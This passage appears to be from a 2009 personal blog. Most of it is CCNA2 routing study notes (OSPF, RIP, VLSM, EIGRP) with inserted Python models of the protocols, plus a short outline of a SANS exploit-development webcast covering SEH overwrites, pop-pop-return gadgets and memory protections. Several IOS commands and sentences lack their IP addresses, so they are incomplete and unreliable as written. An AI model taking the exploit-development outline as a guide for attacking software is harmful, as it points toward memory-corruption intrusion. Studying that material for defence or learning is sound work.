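    A DR or BDR that is still alive keeps its role; a newcomer cannot pre-empt it.
    If the DR fails the BDR is promoted and a new BDR is elected."""
    alive = {r.name for r in routers}
    dr = current_dr if current_dr in alive else None
    bdr = current_bdr if current_bdr in alive else None
    if dr is None and bdr is not None:
        dr, bdr = bdr, None
    ranked = sorted((r for r in routers if r.priority > 0),
                    key=lambda r: (r.priority, r.router_id), reverse=True)
    if dr is None:
        dr = ranked[0].name if ranked else None
    if bdr is None:
        bdr = next((r.name for r in ranked if r.name != dr), None)
    return dr, bdr


if __name__ == "__main__":
    r1 = Router("R1", loopbacks=["10.1.1.1"], physical_up=["192.168.10.1"])
    r2 = Router("R2", router_id_cmd="10.2.2.2", loopbacks=["10.9.9.9"])
    r3 = Router("R3", physical_up=["192.168.10.3", "172.16.3.1"])
    print({r.name: str(r.router_id) for r in (r1, r2, r3)})
    dr, bdr = elect([r1, r2, r3])              # all priority 1: highest router ID wins
    r1.priority, r2.priority = 200, 100        # ip ospf priority on R1 and R2 ...
    print(elect([r1, r2, r3], dr, bdr))        # ... changes nothing until the interfaces bounce
    print(elect([r1, r2, r3]))                 # shutdown / no shutdown: fresh election
```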

After doing a shutdown and a no shutdown on the FastEthernet 0/0 interfaces of all three routers, we see the result of the change of OSPF interface priorities.

In OSPF terminology, the router located between an OSPF routing domain and a non-OSPF network is called the Autonomous System Boundary Router (ASBR).

Static Default Configuration

R1(config)#ip route loopback 1

Like RIP, OSPF requires the use of the default-information originate command to advertise the static

Therefore, 100,000,000 is the default bandwidth referenced when the actual bandwidth is converted into a cost metric.

The reference bandwidth can be modified to accommodate these faster links by using the OSPF command auto-cost reference-bandwidth.

R1(config-router)#auto-cost reference-bandwidth ?
1-4294967 The reference bandwidth in terms of Mbits per second

R1(config-router)#auto-cost reference-bandwidth 10000

Router(config-if)#ip ospf hello-interval seconds
Router(config-if)#ip ospf dead-interval seconds

Monday, October 19, 2009

CCNA2 Chapter 7-9 note

Chapter 7 RIP2
Some of these enhanced features include:
Next-hop addresses included in the routing updates
Use of multicast addresses in sending updates
Authentication option available

R2(config-router)#redistribute static
we want the RIP process on R2 to redistribute our static route ( by importing the route into RIP and then sending it to R1 and R3 using the RIP process.

R2(config)#ip route Null0

The address space represented by the static summary route does not actually exist. In order to simulate this static route, we use a null interface as the exit interface.

RIPv1 cannot support discontiguous networks, VLSM, or Classless Inter-Domain Routing (CIDR) supernets.
Autosummarization can sometimes be a big problem for the routing table.

RIPv1 either summarizes the subnets to the classful boundary or uses the subnet mask of the outgoing interface to determine which subnets to advertise.

All subnets must use the same subnet mask when a classful routing protocol is implemented in the network. If the subnet masks are not the same, the routes will not be sent in updates to other routers.

R1(config)#router rip
R1(config-router)#version 2
R1(config-router)#version 1

By default, RIPv2 automatically summarizes networks at major network boundaries, just like RIPv1.

R1(config-router)#no auto-summary

This command is important! Automatic summarization must be disabled to support discontiguous networks. After this, the router will send updates with the individual subnet masks.

debug ip rip

A supernet is a block of contiguous classful networks that is addressed as a single network.

Supernets have masks that are smaller than the classful mask (/16 here, instead of the classful /24).

What is the default behaviour of RIP if no version type specified?
-send version 1 updates only, receive version 1 and 2 updates

Tip: if RIPv1 is running on a network that uses VLSM, the first thing to do is enable "version 2".

The maximum hop count permitted by default in RIPv2 is 15.

A discontiguous network will have two or more subnetworks of a classful network connected together by different classful networks. It occurs when a classful major network address, such as, is separated by one or more other major networks, like
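What RIPv1 and RIPv2 actually put in an update out of a given interface, and why auto-summary breaks a discontiguous network, is shown in this added Python example (not from the original notes). The routes and interface addresses are constructed samples; the advertisement rules follow the notes above.

```python
"""Added example, not from the original notes: what RIPv1 and RIPv2 advertise out of a
given interface, showing the classful-boundary summarisation behind the discontiguous
network problem and the 'no auto-summary' fix. The routes and interface addresses are
constructed samples."""
from ipaddress import IPv4Interface, IPv4Network


def classful_network(net: IPv4Network) -> IPv4Network:
    """Classful major network of a prefix: class A /8, B /16, C /24."""
    first_octet = int(str(net.network_address).split(".")[0])
    prefix = 8 if first_octet < 128 else 16 if first_octet < 192 else 24
    return IPv4Network(f"{net.network_address}/{prefix}", strict=False)


def rip_advertisements(routes, out_iface: IPv4Interface, version: int = 1,
                       auto_summary: bool = True) -> set:
    """Networks advertised out `out_iface` (split horizon keeps its own network out).
    RIPv1 carries no mask: a subnet of the interface's own major network is sent only
    when its mask equals the interface's mask, anything else is summarised to the
    classful boundary. RIPv2 with auto-summary also summarises at major boundaries;
    with 'no auto-summary' every route goes out with its own mask."""
    advertised = set()
    out_major = classful_network(out_iface.network)
    for route in routes:
        if route == out_iface.network:
            continue                                  # split horizon
        major = classful_network(route)
        if version == 1:
            if major != out_major:
                advertised.add(major)                 # summarise at the classful boundary
            elif route.prefixlen == out_iface.network.prefixlen:
                advertised.add(route)                 # receiver applies its own interface mask
            # else: mask mismatch, RIPv1 silently leaves the subnet out of the update
        elif auto_summary and major != out_major:
            advertised.add(major)
        else:
            advertised.add(route)
    return advertised


if __name__ == "__main__":
    # Constructed router: two 172.30.0.0/16 subnets, a VLSM subnet, and a serial link to a
    # neighbour that (in the discontiguous case) also holds 172.30.0.0/16 subnets.
    routes = [IPv4Network(n) for n in ("172.30.1.0/24", "172.30.2.0/24",
                                       "172.30.100.0/25", "209.165.200.228/30")]
    serial = IPv4Interface("209.165.200.230/30")
    fast = IPv4Interface("172.30.1.1/24")
    print("RIPv1 out serial:", rip_advertisements(routes, serial, 1))
    print("RIPv2 no auto-summary out serial:", rip_advertisements(routes, serial, 2, False))
    print("RIPv1 out FastEthernet:", rip_advertisements(routes, fast, 1))
```

Both ends of the discontiguous network advertise the same 172.30.0.0/16 summary over the serial link, so the router in the middle cannot tell the two halves apart until auto-summary is turned off.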


Chapter 8 Routing Table

Level 1 route is a route with a subnet mask equal to or less than the classful mask of the network address.

A level 1 route can function as a:
Default route - A default route is a static route with the address
Supernet route - A supernet route is a network address with a mask less than the classful mask.
Network route - A network route is a route that has a subnet mask equal to that of the classful mask.

An ultimate route is a route that includes:
either a next-hop IP address (another path)
and/or an exit interface

A level 1 parent route is a network route that does not contain a next-hop IP address or exit interface for any network.

A parent route is actually a heading that indicates the presence of level 2 routes, also known as child routes.

A level 2 route is a route that is a subnet of a classful network address.

A level 1 parent route exists only when there is at least one level 2 child route.

Regardless of the addressing scheme used by the network (classless or classful), the routing table will use a classful scheme.

Steps in the route lookup process:
After the child route search, it will be:

Classful routing behavior: If classful routing behavior is in effect, terminate the lookup process and drop the packet.

ultimate--> parent-->child--> drop

Classless routing behavior: If classless routing behavior is in effect, continue searching level 1 supernet routes in the routing table for a match, including the default route, if there is one.

ultimate--> parent-->child-->level 1 supernet-->default route--> drop

Remember that the route lookup process will need to do a recursive lookup on any route that references only a next-hop IP address and not an exit interface.

Using VLSM does not change the lookup process.

Routing behaviors
no ip classless
ip classless

These two commands determine the address lookup behavior of the routing process.

In IOS versions 11.3 and later, the command ip classless is the default, implementing a classless route lookup process.

A common error is to assume that a default route will always be used if the router does not have a better route. But with classful routing behavior, R2's default route is not examined nor used, although it is a match. This is often a very surprising result when a network administrator does not understand the difference between classful and classless routing behavior.
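The lookup steps above, including the surprising case where a default route is ignored under classful behaviour and the recursive lookup for next-hop-only routes, are modelled in this added Python example (not from the original notes). The routing table, addresses and interface names are constructed samples; the level 1 / parent / child structure follows the notes.

```python
"""Added example, not from the original notes: a model of the route lookup process
above (level 1 ultimate routes, parent/child routes, supernets, default route) under
classful and classless routing behaviour, plus the recursive lookup for routes that
only name a next-hop IP. Networks, next hops and interface names are constructed samples."""
from ipaddress import IPv4Address, IPv4Network


def classful_network(addr: str) -> IPv4Network:
    """Classful major network the address belongs to: class A /8, B /16, C /24."""
    first_octet = int(addr.split(".")[0])
    prefix = 8 if first_octet < 128 else 16 if first_octet < 192 else 24
    return IPv4Network(f"{addr}/{prefix}", strict=False)


def is_ip(via: str) -> bool:
    try:
        IPv4Address(via)
        return True
    except ValueError:
        return False


class RoutingTable:
    def __init__(self, ip_classless: bool = True):
        self.ip_classless = ip_classless      # 'ip classless' (default) vs 'no ip classless'
        self.level1 = {}      # level 1 ultimate routes: IPv4Network -> next hop / exit interface
        self.children = {}    # level 1 parent (classful network) -> {child subnet: next hop}

    def add(self, network: str, via: str) -> None:
        net = IPv4Network(network)
        major = classful_network(str(net.network_address))
        if net.prefixlen > major.prefixlen:   # subnet of a classful network: level 2 child
            self.children.setdefault(major, {})[net] = via   # parent appears automatically
        else:                                 # network, supernet or default route: level 1
            self.level1[net] = via

    def lookup(self, dest: str):
        """Return (matching route, via) or (None, 'drop'), following the notes' steps."""
        ip = IPv4Address(dest)
        major = classful_network(dest)
        # 1. Level 1 ultimate network routes (mask equal to the classful mask).
        for net, via in self.level1.items():
            if net.prefixlen == major.prefixlen and ip in net:
                return net, via
        # 2. A matching parent route: search its child routes, longest match wins.
        if major in self.children:
            matches = [(n, v) for n, v in self.children[major].items() if ip in n]
            if matches:
                return max(matches, key=lambda m: m[0].prefixlen)
            if not self.ip_classless:
                return None, "drop"   # classful: lookup ends here, default route never examined
        # 3. Classless (or no parent matched): supernet routes, then the default route.
        for net, via in sorted(self.level1.items(), key=lambda kv: -kv[0].prefixlen):
            if ip in net:
                return net, via
        return None, "drop"

    def resolve(self, dest: str, depth: int = 0):
        """Recursive lookup: a route with only a next-hop IP needs a second lookup
        to find the exit interface."""
        net, via = self.lookup(dest)
        if net is not None and is_ip(via) and depth < 4:
            _, via = self.resolve(via, depth + 1)
        return net, via


def sample_table(ip_classless: bool) -> RoutingTable:
    """Constructed table: a network route, a parent with two children, a supernet, a default."""
    table = RoutingTable(ip_classless)
    for network, via in [("192.168.1.0/24", "Serial0/0/0"),
                         ("172.16.1.0/24", "Serial0/0/1"),
                         ("172.16.2.0/24", "192.168.1.2"),   # next hop only: recursive lookup
                         ("192.168.0.0/16", "Serial0/0/3"),  # supernet route
                         ("0.0.0.0/0", "Serial0/0/2")]:      # default route
        table.add(network, via)
    return table


if __name__ == "__main__":
    for classless in (True, False):
        table = sample_table(classless)
        print("ip classless" if classless else "no ip classless",
              table.lookup("172.16.3.5"), table.resolve("172.16.2.9"))
```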


Chapter 9 EIGRP
The main purpose in Cisco's development of EIGRP was to create a classless version of IGRP.

EIGRP has a default administrative distance of 90 for internal routes and 170 for routes imported from an external source, such as default routes.

These features include:
Reliable Transport Protocol (RTP)
Bounded Updates
Diffusing Update Algorithm (DUAL)
Establishing Adjacencies
Neighbor and Topology Tables

RTP and the tracking of neighbor adjacencies set the stage for the EIGRP workhorse, the Diffusing Update Algorithm (DUAL).

As the computational engine that drives EIGRP, DUAL resides at the center of the routing protocol, guaranteeing loop-free paths and backup paths throughout the routing domain.

Instead of hop count, both IGRP and EIGRP use metrics composed of bandwidth, delay, reliability, and load. By default, both routing protocols use only bandwidth and delay.

Loop-free means that the neighbor does not have a route to the destination network that passes through this router.

EIGRP does not use holddown timers. Instead, loop-free paths are achieved through a system of route calculations (diffusing computations) that are performed in a coordinated fashion among the routers.

EIGRP packet header opcode:
Update (1)
Query (3)
Reply (4)
Hello (5)

In the IP packet header, the protocol field is set to 88 to indicate EIGRP, and the destination address is set to the multicast If the EIGRP packet is encapsulated in an Ethernet frame, the destination MAC address is also a multicast address: 01-00-5E-00-00-0A.

In the TLV field, by default, only bandwidth and delay are weighted. Both are equally weighted; therefore, the K1 field for bandwidth and the K3 field for delay are both set to 1. The other K values are set to zero.

The Hold Time is the amount of time the EIGRP neighbor receiving this message should wait before considering the advertising router to be down.

If the hold time expires, EIGRP will declare the route as down and DUAL will search for a new path by sending out queries.

The IP External message is used when external routes are imported into the EIGRP routing process.

The Destination field stores the address of the destination network. Although only 24 bits are shown in this figure, this field varies based on the value of the network portion of the 32-bit network address. For example, the network portion of is 10.1. Therefore, the Destination field stores the first 16 bits. Because the minimum length of this field is 24 bits, the remainder of the field is padded with zeros. If a network address is longer than 24 bits (, for example), then the Destination field is extended for another 32 bits (for a total of 56 bits) and the unused bits are padded with zeros.

Protocol dependent modules are responsible for the specific routing tasks for each Network layer protocol.

Reliable RTP requires an acknowledgement to be returned by the receiver to the sender. An unreliable RTP packet does not require an acknowledgement.

Hello packets
normal network - sent every 5 seconds.
nonbroadcast multiaccess network (NBMA), e.g. X.25, Frame Relay, ATM, T1 - sent every 60 seconds

hold time
normal - 15 second
NBMA - 180 seconds

An autonomous system (AS) is a collection of networks under the administrative control of a single entity that presents a common routing policy to the Internet. In the figure, companies A, B, C, and D are all under the administrative control of ISP1. ISP1 "presents a common routing policy" for all of these companies when advertising routes to ISP2.

The ISP is responsible for the routing of packets within its autonomous system and between other autonomous systems.

Although EIGRP refers to the parameter as an "autonomous-system" number, it actually functions as a process ID. This number is not associated with an autonomous system number discussed previously and can be assigned any 16-bit value.

Router1(config)#router eigrp 1
Router2(config)#router eigrp 1
Router3(config)#router eigrp 1

In order to establish neighbor adjacencies, EIGRP requires all routers in the same routing domain to be configured with the same process ID.

The autonomous system parameter is a number chosen by the network administrator between 1 and 65535.

To configure EIGRP to advertise specific subnets only, use the wildcard-mask option with the network command:

Router(config-router)#network network-address [wildcard-mask]

show ip eigrp neighbors

By default, EIGRP automatically summarizes routes at the major network boundary. We can disable the automatic summarization with the "no auto-summary" command, just as we did in RIPv2.

Note: EIGRP automatically includes a Null0 summary route as a child route whenever both of the following conditions exist:
There is at least one subnet that was learned via EIGRP.
Automatic summarization is enabled.

By default, K1 and K3 are set to 1, and K2, K4, and K5 are set to 0.

Router(config-router)#metric weights tos k1 k2 k3 k4 k5

tos is always 0 for EIGRP

default metric = k1*bandwidth + k3*delay

Use the interface command bandwidth to modify the bandwidth metric:

Router(config-if)#bandwidth kilobits

That bandwidth is used for the (10,000,000/bandwidth) * 256 portion of the formula. Next, determine the delay value for each outgoing interface on the way to the destination. Sum the delay values and divide by 10 (sum of delay/10) and then multiply by 256 (* 256). Add the bandwidth and sum of delay values to obtain the EIGRP metric.

EIGRP uses the slowest bandwidth in its metric calculation.
EIGRP uses the cumulative sum of the delay metrics of all of the outgoing interfaces.
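A worked calculation of the composite metric described in the notes above, added here as an example and not taken from the CCNA material. The two-hop path (a serial link and a FastEthernet LAN), its bandwidth and delay values, and the effect of the bandwidth command on the serial interface are all constructed; the load and reliability terms follow the general EIGRP formula, which the notes do not spell out.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Hop:
    """One outgoing interface on the path to the destination (constructed values)."""
    name: str
    bandwidth_kbps: int      # BW from 'show interface', or set with the bandwidth command
    delay_usec: int          # DLY from 'show interface', in microseconds
    reliability: int = 255   # 255/255 = fully reliable (only used when K5 != 0)
    load: int = 1            # 1/255 = minimally loaded (only used when K2 != 0)


def bandwidth_part(path):
    """(10,000,000 / slowest bandwidth) * 256; IOS truncates the division."""
    slowest = min(hop.bandwidth_kbps for hop in path)
    return (10_000_000 // slowest) * 256


def delay_part(path):
    """(sum of delays / 10) * 256, i.e. delay counted in tens of microseconds."""
    total = sum(hop.delay_usec for hop in path)
    return (total // 10) * 256


def eigrp_metric(path, k1=1, k2=0, k3=1, k4=0, k5=0):
    """Composite metric using the K weights from 'metric weights tos k1 k2 k3 k4 k5'.

    With the defaults (K1 = K3 = 1, the rest 0) this is bandwidth_part + delay_part.
    The load and reliability terms are the general EIGRP formula; integer arithmetic
    is used throughout, which matches IOS for the default K values.
    """
    bw = bandwidth_part(path)
    dly = delay_part(path)
    load = max(hop.load for hop in path)
    reliability = min(hop.reliability for hop in path)
    metric = k1 * bw + (k2 * bw) // (256 - load) + k3 * dly
    if k5 != 0:
        metric = metric * k5 // (reliability + k4)
    return metric


# Constructed sample path: a 1024 kbps serial link followed by a FastEthernet LAN.
SAMPLE_PATH = (
    Hop("Serial0/0/0", bandwidth_kbps=1024, delay_usec=20000),
    Hop("FastEthernet0/0", bandwidth_kbps=100000, delay_usec=100),
)

# The same path after 'bandwidth 1544' on the serial interface (the T1 default).
RECLOCKED_PATH = (
    Hop("Serial0/0/0", bandwidth_kbps=1544, delay_usec=20000),
    SAMPLE_PATH[1],
)

if __name__ == "__main__":
    for label, path in (("1024 kbps serial", SAMPLE_PATH), ("1544 kbps serial", RECLOCKED_PATH)):
        print(f"{label}: bandwidth={bandwidth_part(path)} delay={delay_part(path)} "
              f"metric={eigrp_metric(path)}")
```

Changing only the configured bandwidth on the slowest link moves the metric from 3014400 to 2172416, which is why the bandwidth command matters to path selection even though it changes no physical property of the link.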

DUAL determines the best loop-free path and loop-free backup paths.

The feasibility condition (FC) is met when a neighbor's reported distance (RD) to a network is less than the local router's feasible distance to the same destination network. (refer to the screenshot)

R2#show ip eigrp topology
more specific
R2#show ip eigrp topology

A feasible successor (FS) is a neighbor who has a loop-free backup path to the same network as the successor by satisfying the feasibility condition.

The show ip eigrp topology all-links command shows all possible paths to a network, including successors, feasible successors, and even those routes that are not feasible successors.

This finite state machine contains all of the logic used to calculate and compare routes in an EIGRP network.

#debug eigrp fsm

When the successor is no longer available and there is no feasible successor, DUAL will put the route into the active state. DUAL will then send EIGRP queries asking other routers for a path to this network.
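The feasibility condition, feasible successor selection and the passive/active decision from the notes above, worked through in an added example that is not part of the original notes. The topology entries (neighbors R1, R3 and R4 and their reported distances and link costs, as seen from a router R2) are constructed; R4 is included to show that a lower total distance does not make a path a feasible successor.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Path:
    """A topology-table entry for one destination via one neighbor (constructed)."""
    neighbor: str
    reported_distance: int   # RD: the neighbor's own metric to the network
    link_cost: int           # metric added by the link from this router to the neighbor

    @property
    def distance(self):
        return self.reported_distance + self.link_cost


def classify(paths):
    """Split topology entries into (successor, feasible successors, non-feasible paths).

    The successor is the lowest-distance path and its distance is the feasible
    distance (FD). A neighbor is a feasible successor when its RD < FD, which
    guarantees its path cannot loop back through this router.
    """
    ordered = sorted(paths, key=lambda p: p.distance)
    successor = ordered[0]
    fd = successor.distance
    feasible = [p for p in ordered[1:] if p.reported_distance < fd]
    others = [p for p in ordered[1:] if p.reported_distance >= fd]
    return successor, feasible, others


def on_successor_loss(paths):
    """Model DUAL when the current successor disappears.

    Returns ("passive", new_successor) when a feasible successor is promoted without
    querying anyone, or ("active", None) when the route must go active and EIGRP
    queries are sent to the remaining neighbors.
    """
    _successor, feasible, _others = classify(paths)
    if feasible:
        return "passive", min(feasible, key=lambda p: p.distance)
    return "active", None


# Constructed topology table for one destination as seen from R2.
TOPOLOGY = (
    Path("R3", reported_distance=28160, link_cost=2986240),     # distance 3014400
    Path("R1", reported_distance=2172416, link_cost=38854144),  # distance 41026560
    Path("R4", reported_distance=3100000, link_cost=1000),      # distance 3101000
)

if __name__ == "__main__":
    successor, feasible, others = classify(TOPOLOGY)
    print("successor:", successor.neighbor, "FD =", successor.distance)
    print("feasible successors:", [p.neighbor for p in feasible])
    print("not feasible (RD >= FD):", [p.neighbor for p in others])
    print("if the successor is lost:", on_successor_loss(TOPOLOGY))
```

R4's total distance is far lower than R1's, yet only R1 passes the feasibility condition; losing R3 with only R4 left is exactly the case where the route goes active.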

The Null0 summary:
Regardless of whether classful or classless routing behavior is being used, the Null0 summary route will be used, therefore denying the use of any supernet or default route.

example: Even if a default route was configured, R1 would still discard the packet because it matches the Null0 summary route to

To establish EIGRP manual summarization on all interfaces that send EIGRP packets, use the following interface command:

Router(config-if)#ip summary-address eigrp as-number network-address subnet-mask

Because R3 has two EIGRP neighbors, the EIGRP manual summarization is configured on both Serial 0/0/0 and Serial 0/0/1.

EIGRP requires the use of the redistribute static command to include this static default route with its EIGRP routing updates.

Note: There is another method to propagate a default route in EIGRP, using the ip default-network command.

Router(config-if)#ip bandwidth-percent eigrp as-number percent
This command is used to configure the percentage of bandwidth that may be used by EIGRP on an interface.

In our example, if the bandwidth is 64 kbps, we are limiting EIGRP to no more than 50 percent of the link's bandwidth. Therefore, EIGRP will never use more than 32 kbps of the link's bandwidth for EIGRP packet traffic.

Router(config-if)#ip hello-interval eigrp as-number seconds

If you change the hello interval, make sure that you also change the hold time to a value equal to or greater than the hello interval.

Router(config-if)#ip hold-time eigrp as-number seconds

What is the purpose of the EIGRP neighbor and topology tables?
The neighbor and topology tables are used by DUAL to build the routing table.

topology table: contains successors and feasible successors

routing table: contains successors only

Friday, October 2, 2009

Tuesday, September 29, 2009

Linux Varsiti @ Universiti Teknologi Malaysia 2009 - 5th Oct 2009

Linux Varsiti Edisi Selatan (Johor)

Linux Varsiti is a programme aimed at bringing Open Source Software to tertiary education institutes in Malaysia.

Date: Monday, October 5, 2009
Time: 9:00am - 6:30pm
Location: Universiti Teknologi Malaysia
Street: Jalan Universiti
City/Town: Skudai, Malaysia

Tentative:

1. Introduction to Open Source Software
2. Facebook Developer Garage Program
3. GIMP vs Photoshop
4. Basic Installation of Linux Distro
5. Career Opportunity in OSS

More information

Join LinuxVarsiti on Facebook.

Saturday, September 26, 2009

The 2009 Virtual Conference on Information Security

Two days back, I attended "The 2009 Virtual Conference on Information Security", which was organised by Infosecurity Magazine. Indeed it was a brand new experience, as the conference was totally virtual and the whole involvement was done only in front of my desktop. There were several webinars at the Keynote Theatre which were broadcast live for 7 hours, and I managed to catch up with a few.

One interesting point was that conference delegates may visit the Exhibit Hall. The virtual booths included Trend Micro, Sybase, Overtis, LANDesk, Webroot, PGP, Check Point and Info Security. We may obtain some white papers, brochures and technical papers by just clicking the "save to briefcase" button. The resources will be saved in our conference bag and we can download them afterward.

Great experience! Unfortunately the recorded video sessions are not yet available for download at the moment. I wish that they will be up soon.

Screenshots:

Main hall

The Exhibit Hall

The Keynote Theater

Sunday, September 20, 2009

SANS webcast - Developing exploits

SEC709 Developing Exploits for Penetration Tester and Security

From Stephen Sims

Precompiled frameworks
-Core Impact
-Immunity CANVAS

Code analysis
code scanning tools: gcar, lcar
(I didn't really catch the application names he mentioned, such as gcar and lcar)

Debugger : immunity debugger

OS monitoring tools
-ProcMon, RegMon, FileMon, RegShot

What happens during the crash?
-Analyse the status of each register
e.g. a suspicious 0x41414141 if the input is 'A'
-Is the return pointer or SEH chain overwritten?
Analyse the stack segment and monitor ESP/EBP
-Is the heap overwritten?
Analyse dynamic memory allocation

Tool : findjump kernel32.dll edx
-get pop-pop-return address

Several protections

-protects the SEH pointer against overwrite

-randomises the location of libraries and memory segments

-prevents code execution on the stack and heap

Security cookies
-pushes unique values onto the stack and heap during allocations, which are checked upon exit or free

Useful screenshot

Sunday, September 13, 2009

CCNA2 Chapter 5 - 6 note

Finished another 2 chapters.

My notes


Chapter 5 RIPv1

RIP messages are encapsulated in a UDP segment, with source and destination ports of 520.

One RIP update can contain up to 25 route entries. The maximum datagram size is 512 bytes, not including the IP or UDP headers.

To enter the router configuration mode for RIP, enter 'router rip' at the global configuration prompt.

debug ip rip
undebug all

The correct solution is to use the passive-interface command, which prevents the transmission of routing updates through a router interface but still allows that network to be advertised to other routers. Enter the passive-interface command in router configuration mode.

Router(config-router)#passive-interface interface-type interface-number

This command stops routing updates out the specified interface. However, the network that the specified interface belongs to will still be advertised in routing updates that are sent out other interfaces.

RIP is a classful routing protocol that automatically summarizes classful networks across major network boundaries.

classless routing protocols like RIPv2 allow the same major (classful) network to use different subnet masks on different subnets, better known as Variable Length Subnet Masking (VLSM).

How does R2 know that this subnet has a /24 ( subnet mask?
R2 uses its own subnet mask on this interface and applies it to this and all other subnets that it receives on this interface

RIPv1 lacks support for discontiguous networks. It may result in load balancing between 2 discontiguous networks.

'default-information originate' - specify that this router is to originate default information, by propagating the static default route in RIP updates.

You can see that there is a candidate default route, as denoted by the R* code. The static default route on R2 has been propagated to R1 in a RIP update. R1 has connectivity to the LAN on R3 and any destination on the Internet.


Chapter 6 VLSM

CIDR uses Variable Length Subnet Masks (VLSM) to allocate IP addresses to subnets according to individual need rather than by class.

As you most likely recall, VLSM is simply subnetting a subnet. VLSM can be thought of as sub-subnetting.

As you previously learned, route summarization also known as route aggregation, is the process of advertising a contiguous set of addresses as a single address with a less-specific, shorter subnet mask. Remember that CIDR is a form of route summarization and is synonymous with the term supernetting.

CIDR allows for supernetting. A supernet is a group of major network addresses summarized as a single network address with a mask less than that of the default classful mask.

Supernetting refers to the ability to summarise networks with a mask shorter than the classful default mask.
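Route summarization as described in this chapter, together with the Null0 summary route and automatic summarization at the classful boundary from the EIGRP and RIP notes above, worked through in an added example that is not part of the original notes. The component networks and the test addresses are constructed; the functions compute the shortest common prefix, show which addresses a summary advertises that no component owns (the traffic the Null0 route discards), and the classful network a prefix is auto-summarized to.

```python
import ipaddress


def summarize(networks):
    """Smallest single prefix covering every network: the bits all network
    addresses share become the shorter, less-specific mask of the summary."""
    nets = [ipaddress.ip_network(n) for n in networks]
    summary = nets[0]
    while not all(n.subnet_of(summary) for n in nets):
        summary = summary.supernet()   # one bit shorter each time
    return summary


def uncovered_by_components(networks):
    """Blocks inside the summary that none of the component networks own.

    Packets to these addresses match the summary but no more specific route; on
    the summarizing router they hit the Null0 summary route and are discarded
    instead of following a supernet or default route.
    """
    nets = [ipaddress.ip_network(n) for n in networks]
    remaining = [summarize(networks)]
    for net in nets:
        still_free = []
        for block in remaining:
            if net.subnet_of(block):
                still_free.extend(block.address_exclude(net))  # empty if equal
            else:
                still_free.append(block)
        remaining = still_free
    return sorted(remaining)


def discarded_to_null0(destination, networks):
    """True when a packet to 'destination' is dropped by the Null0 summary route."""
    dst = ipaddress.ip_address(destination)
    in_summary = dst in summarize(networks)
    in_component = any(dst in ipaddress.ip_network(n) for n in networks)
    return in_summary and not in_component


def classful_summary(network):
    """Major (classful) network that RIPv1 or EIGRP auto-summary advertises
    when the prefix crosses a major network boundary."""
    net = ipaddress.ip_network(network)
    first_octet = int(net.network_address) >> 24
    if first_octet < 128:
        prefixlen = 8       # class A
    elif first_octet < 192:
        prefixlen = 16      # class B
    elif first_octet < 224:
        prefixlen = 24      # class C
    else:
        raise ValueError(f"{network} is not in a unicast class A/B/C range")
    return ipaddress.ip_network((int(net.network_address), prefixlen), strict=False)


# Constructed inputs: four contiguous /24s that summarize exactly, and three
# that need the same /22 but leave 192.168.3.0/24 unowned.
CONTIGUOUS = ("172.16.0.0/24", "172.16.1.0/24", "172.16.2.0/24", "172.16.3.0/24")
PARTIAL = ("192.168.0.0/24", "192.168.1.0/24", "192.168.2.0/24")
```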

Saturday, September 12, 2009

CCNA2 Chapter 1 - 4 note

Note :

Chapter 1 Introduction to Routing

NVRAM - startup configuration file
flash - Cisco IOS

The enable password and enable secret password need not both exist. An enable secret password alone is already enough.

Important: without this line, the user will be granted access to the line without entering a password.

Router#copy running-config startup-config

RIP (Routing Information Protocol)
IGRP (Interior Gateway Routing Protocol)
EIGRP (Enhanced Interior Gateway Routing Protocol)
OSPF (Open Shortest Path First)
IS-IS (Intermediate System-to-Intermediate System)
BGP (Border Gateway Protocol)

Note: RIP (versions 1 and 2), EIGRP, and OSPF are discussed in this course. EIGRP and OSPF are also explained in more detail in CCNP, along with IS-IS and BGP. IGRP is a legacy routing protocol and has been replaced by EIGRP. Both IGRP and EIGRP are Cisco proprietary routing protocols, whereas all other routing protocols listed are standard, non-proprietary protocols.

As a packet is forwarded from router to router, the Layer 3 source and destination IP addresses will not change; however, the Layer 2 source and destination data link addresses will change. This process will be examined more closely later in this section.

Best path for RIP - hop count
Best path for OSPF - bandwidth of the link


Chapter 2 Static routing

Two types of cables can be used with Ethernet LAN interfaces:
A straight-through, or patch cable, with the order of the colored pins the same on each end of the cable
A crossover cable, with pin 1 connected to pin 3, and pin 2 connected to pin 6

Straight-through cables are used for:

Crossover cables are used for:

#show ip interface brief
#show interface fastethernet 0/0

Typically, the router is the DTE device and is connected to a CSU/DSU, which is the DCE device. The CSU/DSU (DCE device) is used to convert the data from the router (DTE device) into a form acceptable to the WAN service provider.

Although Cisco serial interfaces are DTE devices by default, they can be configured as DCE devices.

To configure a router to be the DCE device:

1. Connect the DCE end of the cable to the serial interface.

2. Configure the clock signal on the serial interface using the clock rate command.

!!! Note: If a router's interface with a DTE cable is configured with the clock rate command, the IOS will disregard the command and there will be no ill effects.

A stub network is a network accessed by a single route.

R1(config)#ip route

(this is entered at privileged mode, not at line mode)

recursive lookup
- We will see in the next section that static routes can be configured with an exit interface. This means that they do not need to be resolved using another route entry.
- if a static route's exit interface column shows an IP address (a next hop), a recursive lookup needs to be done to get the exit interface
- if the exit interface is 'fa 0/0' or 'serial 0/0/0', no recursive lookup is needed

There is an advantage to utilizing exit interfaces in static routes for both serial point-to-point and Ethernet outbound networks. The routing table process only has to perform a single lookup to find the exit interface instead of a second lookup to resolve a next-hop address.

What are the most common metrics used in IP dynamic routing?
Hop count,bandwidth, delay and cost

Default route
The key to this configuration is the /0 mask.
Default routes are very common on routers.

The original static route must be removed before adding a new one.

Exit interface is down
Let's consider what would happen if an exit interface goes down. For example, what would happen to R1's static route to if its Serial 0/0/0 interface went down? If the static route cannot be resolved to an exit interface, in this case Serial 0/0/0, the static route is removed from the routing table.

The rate configured on the DCE determines the clock rate.

A static route that points to a next-hop IP will have an administrative distance of 1 and a metric of 0.


Chapter 3 Intro to dynamic routing protocols

BGP is typically used between ISPs and sometimes between a company and an ISP.

Distance vector protocols work best in situations where:
The network is simple and flat and does not require a special hierarchical design.
The administrators do not have enough knowledge to configure and troubleshoot link-state protocols.
Specific types of networks, such as hub-and-spoke networks, are being implemented.
Worst-case convergence times in a network are not a concern.

In contrast to distance vector routing protocol operation, a router configured with a link-state routing protocol can create a "complete view" or topology of the network by gathering information from all of the other routers.

Link-state routing protocols do not use periodic updates. After the network has converged, a link-state update is only sent when there is a change in the topology.

Link-state protocols work best in situations where:
The network design is hierarchical, usually occurring in large networks.
The administrators have a good knowledge of the implemented link-state routing protocol.
Fast convergence of the network is crucial.

Classful routing protocols include RIPv1 and IGRP

